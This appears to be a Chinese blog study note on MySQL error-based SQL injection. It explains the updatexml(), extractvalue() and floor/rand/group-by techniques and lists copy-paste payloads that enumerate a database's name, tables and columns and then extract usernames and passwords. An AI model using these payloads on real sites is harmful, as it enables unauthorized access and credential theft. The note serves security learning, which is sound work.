网络安全学习笔记——报错注入

已于 2024-08-08 13:42:03 修改
阅读量93 收藏
点赞数
分类专栏: 网络安全 文章标签: 学习 笔记
于 2023-05-12 23:53:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72324806/article/details/130651592
版权

通过页面的报错回显进行注入,出现错误的时候MySQL就会显示错误,报错注入网上有资源,实际上在使用的时候也是直接在网上的payload上复制粘贴——报错注入首先要有报错的回显点,适用于页面无正常回显

注入原理:利用数据库执行错误时返回的错误信息来获取敏感数据或执行恶意操作

使用这些语句的时候————闭合是首要的
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
其中0x7e是hex编码,是 ~ 的意思
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
此语句可以爆出数据库名

updatexml()函数

字面意思:更新xml文件,三个参数分别是原来的对象名称,原来对象的路径,更改后的对象名称

能用于SQL注入是因为如果原来对象的路径如果写错了,updatexml() 函数就会检测该路径是不是原来对象的路径,检测的话就要执行,不是则会报错,执行的话可以借机执行一些期望的语句完成注入

UPDATEXML (XML_document, XPath_string, new_value);

concat()函数作为函数的第二个参数的主函数,有两个参数,0x7e是 ~,后面的一项用于执行SQL语句,经过concat拼接两个字符串之后,整体会作为updatexml() 函数的第二个参数执行

爆库
id=-1 or updatexml(1,concat(0x7e,(select database())),1) -- -

爆表
id=-1 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)-- -

爆字段
id=-1 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1)-- -

爆内容
id=-1 or updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1)-- -
//但是group_concat() 显示受前端字数限制,不会显示全

主要理解其语句的原理,在实战中,使用复制粘贴即可 

用于在报错信息中显示MySQL的版本号

select updatexml(1, concat(0x7e, @@version, 0x7e), 1) from users;

extractvalue()函数

EXTRACTVALUE() 函数是 MySQL 中用于从 XML 文档中提取值的函数。然而,从 MySQL 5.7.5 版本开始,EXTRACTVALUE() 函数已经被标记为已弃用(deprecated),并在后续版本中可能会被移除。尽管如此,它在一些旧的系统或特定的上下文中仍然可能被使用

EXTRACTVALUE() 函数的基本语法如下:

EXTRACTVALUE(xml_frag, xpath_expr)
  • xml_frag 是包含 XML 数据的字符串或列
  • xpath_expr 是用于从 xml_frag 中提取数据的 XPath 表达式

报错原因与updatexml()函数类似,都是读取路径报错

爆库
id=-1 or extractvalue(1,concat(0x7e,(select database())))

爆表
id=-1 or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))

爆字段
id=-1 or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))

爆内容
id=-1 or extractvalue(1,concat(0x7e,(select group_concat(password) from users)))

floor() 函数

floor报错的原理——floor、rand、group by三者冲突报错

floor函数用于向下取整,rand函数用于生成一个随机数

  • rand()——在(0,1)随机取一个数,无规律
  • rand(0)——在(0,1)随机取一个数,有规律

group by函数——实战中,可以统计多个相同类别的一组数据

select id from article group by id

在表article中,只查询id,然后按照id进行分组,有几组就会显示几组

select id,count(*) from article group by id

该语句添加了count(*)项,用于统计每一组的数量

group by的意义

建立一个新的虚拟表,第一次是在虚拟表内进行查询,看有没有这个主键(主键不允许重复),如果没有再查一次(相当于确认插入数据)后添加(查询两次,插入一次)

如果存在就直接加一(查询一次,加1一次)

floor (rant(0)*2)的查询结果是有规律的,每次查询的结果都是——01101 10011——主要是rant(0)*2的随机数是有规律的

  1. 第一次查询得到 0 @ 版本号,看有没有这个主键;如果没有就插入,但在插入之前,还会再次查询,此时就会变为 1 @ 版本号,然后插入成为第1条
  2. 然后下一次查询到 1 @ 版本号,由于该主键在数据表中已经存在,所以不会再进行第二次查询,直接在数据表中,次数加1
  3. 第三次查询,查到 0 @ 版本号,数据库中没有该主键,所以要执行插入操作,就会再次查询,此时查到的是 1 @ 版本号,但1 @ 版本号的主键已经存在了,不能插入了——此时会显示主键错误,并回显

类似的函数还有:'CAST()' 函数、'CONVERT()'、'SUBSTRING()'

Nosery
关注
专栏目录
网络安全自学教程》- SQL注入之报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 5557
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
网络安全工程师面试合集】—SQL注入分类 以及 常用注入点
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
11-29 4745
目录 4.1.1. 注入分类 4.1.1.1. 简介 4.1.1.2. 按技巧分类 4.1.1.3. 按获取数据的方式分类 4.1.1.3.1. inband 4.1.1.3.2. inference 4.1.1.3.3. out of band (OOB) 4.1.2. 注入检测 4.1.2.1. 常见的注入点 4.1.2.2. Fuzz注入点 4.1.2.3. 测试用常量 4.1.2.4. 测试列数 4.1.2.5. 报错注入 4.1.2.5.1. 基于geometric的报
十种MySQL报错注入
weixin_30889885的博客
01-09 164
1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue() select * from t...
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4542
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结
Welcome To Myon'Blog !
12-24 5706
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入
SQL注入—基于报错注入
Snowflake1997的博客
02-18 1129
问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-1/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻找.
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1274
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
CTF学习笔记——LoveSQL
Obs_cure的博客
09-14 978
一、[极客大挑战 2019]LoveSQL 1.题目 2.解题步骤 题目提示了sqlmap,还是老规矩试一下 继续使用其他sql语句尝试一下,先试试万能的1' or 1=1 #,结果成功了…爆出一段奇妙的码,试了一下不是flag。接下来尝试一下查询呢 3.总结 4.参考资料 buuctf 极客大挑战 lovesql_SopRomeo的博客-CSDN博客 ...
CTF学习笔记——[极客大挑战 2019]BabySQL
Obs_cure的博客
02-09 1455
一、[极客大挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
网安学习笔记(一)——SQL注入漏洞
qq_41599682的博客
06-17 648
此文为了仅为了帮助自己记录学习网络安全时的笔记。小白一枚,如有错误还望大佬指正。 SQL注入漏洞 原理 用户可控参数中注入SQL语法,破坏原有的SQL结构,达到编写程序时意料之外结果的攻击行为 原因 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造了SQL语句。 未对用户可控参数进行足够的过滤便将参数内容拼接进入到语句之中。 SQL注入漏洞的关键条件:输入可控;原本要执行的代码拼接了输入 注入点 根据原理,在用户可控参数中注入SQL语法,也就是说只要web应用在获取用户数据的地
SQL 报错注入详解
2301_78008478的博客
05-08 993
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
sql注入之报错注入
weixin_47075747的博客
02-28 5511
报错注入 常用的报错注入就两种:extractvalue , updatexml 什么时候使用报错注入呢? 当没有一个合适的数据返回点的时候就需要报错注入。注入的时候后端是被注入了的,但是前端没有得到更好的显示。 extractvalue payload: and extractvalue(null,concat(0x7e,(payload),0x7e)) 对数据库进行 xml 文档的故意报错 利用 concat 在后台进行拼接 指定第一个参数为 null ,让他故意报错,讲第二个参数种的语句带入
2、报错注入(详解)
最新发布
weixin_51520483的博客
05-17 1063
报错注入中:①引入特定字符可以帮助确保输出内容在错误消息中完整显示,通过字符拼接的方式引入特定字符,例如:concat()②特定字符最好用十六进制的方式引入③附:ascll码十进制、十六进制对照表ASCII码16进制对照表_阿斯克码16进制-CSDN博客。
12、SQL注入——SQL报错注入
qq_55202378的博客
12-05 600
通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号名、用户名等)通过页面的错误提示显示出来。
小白报错注入学习(以extractvalue函数报错为例)
qq_35075142的博客
04-18 307
XPath_string (Xpath格式的字符串):XPath_string (Xpath格式的字符串):Xpath_string是xpath格式的字符串。:Xpath_string是xpath格式的字符串。:String 格式,替换查找到的符合条件的数据。:String 格式,替换查找到的符合条件的数据。:String 格式,XML 文档对象的名称。:String 格式,XML 文档对象的名称。如果要等效为联合注入的格式的话,是这样子:1。:string格式,为xml文档对象的名称。
SQL注入之报错注入
ranuy阮的博客
03-05 433
******0x01 **报错注入 在实际场景中,没有一个数据的返回信息点。此时需要用报错注入使其显示出注入信息。 使用到报错注入的场景有: 普通报错注入,即没有数据返回点 insert注入 update注入 delete注入 0x02 常用到的两个报错函数 updatexml()和extractvalue()函数 0x03 updatexml函数 updatexml( (XML_documen...
SQL报错注入
qq_64332865的博客
02-18 615
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
深入浅出带你学习报错注入
A_991128a的博客
01-01 902
报错注入是一种SQL注入类型,用于使SQL语句报错的语法,用于注入结果无回显但错误信息有输出的情况。返回的错误信息即是攻击者需要的信息。所以当我们没有回显位时可以考虑报错注入这种方法来进行渗透测试。接下来带给大家常用的三种报错注入函数。得到我们想要的信息,成功注入。结语==今天给大家讲了错报注入,原理跟盲注不是很一样,但还是挺好理解的,希望大家可以动手在靶机里试一试,错报注入在渗透中还是挺好用的,如果喜欢本文不妨一键三连。## 网络安全工程师(白帽子)企业级学习路线。
《深入浅出MFC》学习笔记——Windows编程核心
"深入浅出MFC学习笔记是关于Microsoft Foundation Classes (MFC) 的一本经典教程,由柴树杉整理。MFC 是微软提供的一个C++类库,用于简化Windows应用程序的开发,特别是基于Win32 API的应用。本书旨在帮助读者深入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值